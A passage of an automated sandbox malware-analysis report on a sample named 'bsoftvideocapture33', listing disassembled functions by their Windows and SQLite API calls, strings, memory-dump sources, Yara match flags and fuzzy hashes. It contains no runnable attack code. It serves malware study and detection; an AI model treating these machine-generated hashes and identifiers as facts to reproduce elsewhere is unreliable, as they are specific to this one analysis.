                                                                                                                                        • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60963621
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4276469440-0
                                                                                                                                        • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                                                        • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                                                                        • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                                                                        • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C02706
                                                                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C0272B
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C23173), ref: 02C02738
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02C02778
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C027D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                                        • String ID: timer
                                                                                                                                        • API String ID: 4293676635-1792073242
                                                                                                                                        • Opcode ID: b185e25b80a418f3bf3ca5460265076b90b178316f6016cffcb2ed4abe66d255
                                                                                                                                        • Instruction ID: 58c7c8e5153c406b5253a6efd6b8cb435bc5727594f19ed9174f25db3a007e7f
                                                                                                                                        • Opcode Fuzzy Hash: b185e25b80a418f3bf3ca5460265076b90b178316f6016cffcb2ed4abe66d255
                                                                                                                                        • Instruction Fuzzy Hash: D2318FB1904715AFD310DF69D888B17BBE8FB48765F004A2DF85582680DB70E954CFD6
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                                                                        Strings
                                                                                                                                        • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                                                                        • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                        • API String ID: 4080917175-264706735
                                                                                                                                        • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                                                        • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                                                                        • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                                                                        • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                                                                        • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                                                                        • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: library routine called out of sequence$out of memory
                                                                                                                                        • API String ID: 2019783549-3029887290
                                                                                                                                        • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                                                        • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                                                                        • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                                                                        • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 02C14A04
                                                                                                                                          • Part of subcall function 02C170C0: RtlEncodePointer.NTDLL(00000000), ref: 02C170C3
                                                                                                                                          • Part of subcall function 02C170C0: __initp_misc_winsig.LIBCMT ref: 02C170DE
                                                                                                                                          • Part of subcall function 02C170C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02C2F248,00000008,00000003,02C2EC8C,?,00000001), ref: 02C17E41
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C17E55
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C17E68
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C17E7B
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C17E8E
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C17EA1
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C17EB4
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C17EC7
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C17EDA
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C17EED
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C17F00
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C17F13
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C17F26
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C17F39
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C17F4C
                                                                                                                                          • Part of subcall function 02C170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C17F5F
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 02C14A09
                                                                                                                                        • __mtterm.LIBCMT ref: 02C14A12
                                                                                                                                          • Part of subcall function 02C14A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C174F6
                                                                                                                                          • Part of subcall function 02C14A7A: _free.LIBCMT ref: 02C174FD
                                                                                                                                          • Part of subcall function 02C14A7A: RtlDeleteCriticalSection.NTDLL(02C31978), ref: 02C1751F
                                                                                                                                        • __calloc_crt.LIBCMT ref: 02C14A37
                                                                                                                                        • __initptd.LIBCMT ref: 02C14A59
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02C14A60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                        • Opcode ID: 1872f6af1a4095fd3248341b28a80e11bce3422f1c4c7b2bd6898dc405e40eec
                                                                                                                                        • Instruction ID: 1e10bcfd50ab6e0784b6d1f5681508bf792b69a63065926e69e7093bd2687e66
                                                                                                                                        • Opcode Fuzzy Hash: 1872f6af1a4095fd3248341b28a80e11bce3422f1c4c7b2bd6898dc405e40eec
                                                                                                                                        • Instruction Fuzzy Hash: C2F0F0335883116DE63CBBB87C1336A2A869F43770B220B29E025D84C0FF118101B984
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 02C124EB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C124F2
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02C124FE
                                                                                                                                        • RtlDecodePointer.NTDLL(00000001), ref: 02C1251B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-340411864
                                                                                                                                        • Opcode ID: 7cdec6ee546dd2948f8671a08559df9a21677a0906e9ad795385d8b60b0f9dc8
                                                                                                                                        • Instruction ID: 02e691cadad034404f09f421aa90f070ae687eda24a158eb7b0c8bcfb917be42
                                                                                                                                        • Opcode Fuzzy Hash: 7cdec6ee546dd2948f8671a08559df9a21677a0906e9ad795385d8b60b0f9dc8
                                                                                                                                        • Instruction Fuzzy Hash: 32E01271FE0310ABEB345BB4ECCEB153AB9A741786F515E60B042D5084CFB4416C9F60
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C124C0), ref: 02C125C0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02C125C7
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02C125D2
                                                                                                                                        • RtlDecodePointer.NTDLL(02C124C0), ref: 02C125ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-2819208100
                                                                                                                                        • Opcode ID: 62251a08513ddb1826b13314274023b63d3ae47e24be9d6b0962ce357cdd6e24
                                                                                                                                        • Instruction ID: ceaa7413686948fb82c76f991730b0e173cdbc40645a85b27fdad5efea66c3ed
                                                                                                                                        • Opcode Fuzzy Hash: 62251a08513ddb1826b13314274023b63d3ae47e24be9d6b0962ce357cdd6e24
                                                                                                                                        • Instruction Fuzzy Hash: 80E0BF70ED0210ABE7385B60BD1DB153668B744745F511E24F506E6244DFB851689E60
                                                                                                                                        APIs
                                                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,4213E8DE,?,?,?,?,00000000,02C240D8,000000FF,02C111DA), ref: 02C10F7A
                                                                                                                                        • TlsSetValue.KERNEL32(FFFFFFFF,02C111DA,?,?,00000000), ref: 02C10FE7
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C11011
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 02C11014
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapValue$FreeProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1812714009-0
                                                                                                                                        • Opcode ID: 792396838af685bd7528fc474f441e06df8b10408167c42e4090c4ff5754b56a
                                                                                                                                        • Instruction ID: 8ee604030f26bfe20c1b3eec454bc0a72ecac34c265262a85509bdc8ad89019f
                                                                                                                                        • Opcode Fuzzy Hash: 792396838af685bd7528fc474f441e06df8b10408167c42e4090c4ff5754b56a
                                                                                                                                        • Instruction Fuzzy Hash: 4351D131A043849FD720CF29C845B16BBE4EB867A4F098659E91DAB380D775ED04DFD1
                                                                                                                                        APIs
                                                                                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 02C22DB0
                                                                                                                                        • __FindPESection.LIBCMT ref: 02C22DCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 876702719-0
                                                                                                                                        • Opcode ID: 14683eb906623d19fdf31907a899f192c56ff9f379bcb1c2c7f911b417ebaa28
                                                                                                                                        • Instruction ID: 4edaf070178d30287bfb71ee5a8eccc6f36422424fa712b0a97ad3c07fb03f7a
                                                                                                                                        • Opcode Fuzzy Hash: 14683eb906623d19fdf31907a899f192c56ff9f379bcb1c2c7f911b417ebaa28
                                                                                                                                        • Instruction Fuzzy Hash: 04A1B171A006258FDB15CF18DC80BADB7A5FB88364F584669DC15E7350EB31ED09CB92
                                                                                                                                        APIs
                                                                                                                                        • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                                                                        • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                                                                        • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StringType$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852931651-0
                                                                                                                                        • Opcode ID: cf2b00ed6b196f36b683551b44420558e4c124c4ce81df5fbf361f916f1db976
                                                                                                                                        • Instruction ID: c24f9c314fd5361508d9a81ca748d23a743e3bd76f11a01e88467cad10db7353
                                                                                                                                        • Opcode Fuzzy Hash: cf2b00ed6b196f36b683551b44420558e4c124c4ce81df5fbf361f916f1db976
                                                                                                                                        • Instruction Fuzzy Hash: A7418072500219EFDF119F94DE85AAF3F78EB04310F11453AFA52F6290C73989608BA8
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                                                                          • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                                                                        • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                                                        • String ID: List of tree roots: $d$|
                                                                                                                                        • API String ID: 3709608969-1164703836
                                                                                                                                        • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                                                        • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                                                        • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                                                        • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                                                        APIs
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C01CB1
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02C01CBA
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(02C35264,00000000), ref: 02C01CC6
                                                                                                                                        • TerminateThread.KERNEL32(?,00000000), ref: 02C01CD4
                                                                                                                                        • QueueUserAPC.KERNEL32(02C01E7C,?,00000000), ref: 02C01CE1
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C01CEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1946104331-0
                                                                                                                                        • Opcode ID: 0e9602b5e63db14f359ae297ead5015130c3ffd1aee7cedbd20e09d86ebcd070
                                                                                                                                        • Instruction ID: 07c988c4090f7202e87e3e7216e27dd6d2be75789580d891f361c3bb88e24550
                                                                                                                                        • Opcode Fuzzy Hash: 0e9602b5e63db14f359ae297ead5015130c3ffd1aee7cedbd20e09d86ebcd070
                                                                                                                                        • Instruction Fuzzy Hash: B2F08135960210AFD7245B96DC0DE5BBBBCEB85B617414719F52A82190DFB09814CBE0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                                                          • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                                                                        • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                                                                        • String ID: e
                                                                                                                                        • API String ID: 786425071-4024072794
                                                                                                                                        • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                                                        • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                                                                        • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                                                        • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                        • API String ID: 1385375860-4131005785
                                                                                                                                        • Opcode ID: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                                                                        • Instruction ID: 8e0d8efe135bd9bd4ab90b631ae35de0fa5087430b450c3f58eab12f6465c816
                                                                                                                                        • Opcode Fuzzy Hash: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                                                                        • Instruction Fuzzy Hash: BD3102319012886DEB319A745C46B9B7F6C9B02309F2404FBE185F52C3E6389F89CB1D
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_exec
                                                                                                                                        • String ID: sqlite_master$sqlite_temp_master$|
                                                                                                                                        • API String ID: 2141490097-2247242311
                                                                                                                                        • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                                                        • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                                                                        • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
